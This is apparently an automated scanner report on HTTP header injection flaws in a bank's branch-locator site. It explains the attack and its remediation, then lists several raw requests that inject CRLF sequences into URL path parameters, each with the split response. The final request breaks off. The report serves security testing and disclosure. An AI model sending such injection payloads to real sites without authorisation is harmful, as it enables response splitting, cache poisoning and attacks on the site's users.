HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 3 is copied into the Location response header. The payload 258c1%0d%0ab5fcc056984 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/258c1%0d%0ab5fcc056984/branch_and_atm_locations/locations.html HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:55:45 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=BDA04A884E0FFA5D8F869F7BA51BD295.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/258c1 b5fcc056984/branch_and_atm_locations/locations.html?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/html
The value of REST URL parameter 4 is copied into the Location response header. The payload 5bcba%0d%0a142fb5c1123 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/10010_New__York_NY/5bcba%0d%0a142fb5c1123/locations.html HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:57:23 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=4DEEBA4F2489BE81E85BAEE93007D057.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Location: http://locators.bankofamerica.com/locator/locator/10010_NEW__YORK_NY/5bcba 142fb5c1123/locations.html Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/html
The value of REST URL parameter 5 is copied into the Location response header. The payload 14e54%0d%0af6fb013b7e was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/10010_New__York_NY/branch_and_atm_locations/14e54%0d%0af6fb013b7e HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:54:18 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=B09B627C0677CCE32265641B804FD287.ftb-web2; Path=/locator/locator P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/10010_New__York_NY/branch_and_atm_locations/14e54 f6fb013b7e?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload e6eb7%0d%0a58755174d68 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/e6eb7%0d%0a58755174d68/bank_branch_locations/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:42:12 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=BD12A040464B592C86E213A7123EB32B.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/e6eb7 58755174d68/bank_branch_locations/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload cfafd%0d%0ae09a30829ba was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/cfafd%0d%0ae09a30829ba/ HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:43:42 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=E31A7BC8D18C6792CD50B58B4686F70D.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/cfafd e09a30829ba/?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload fb147%0d%0a793c0b6d8ff was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/fb147%0d%0a793c0b6d8ff/bank_branch_locations/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:44:13 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=6F661A1E5D335C56BAE8850871508933.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/fb147 793c0b6d8ff/bank_branch_locations/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 244ae%0d%0af917aa15360 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/244ae%0d%0af917aa15360/action=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(2%2C'BC-15732'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; NSC_CbolPgBnfsjdb=445b320a7852; cmTPSet=Y; testCookie=INFONOW_TEST_COOKIE_SUPPORT; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 20:42:59 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26 Set-Cookie: JSESSIONID=09BFBA4223D5EEF22651A8CAA9DA7026.ftb-web2; Path=/locator/locator Pragma: no-cache cache-control: no-store P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL' Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator Location: http://locators.bankofamerica.com/locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/244ae f917aa15360/action=route?shouldTest=true Content-Language: en-US Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload a04e7%0d%0a478f6ad321f was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/103__E__23rd__St_10010_NEW__YORK_NY/bank_branch_locations/a04e7%0d%0a478f6ad321f=route HTTP/1.1 Host: locators.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; cmRS=&t1=1290631212192&t2=1290631261549&t3=1290631386330&fti=1290631386329&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394; JSESSIONID=3D58610A4039B51EA897A7A08BE188ED.ftb-web2; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; profilePageState=; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; 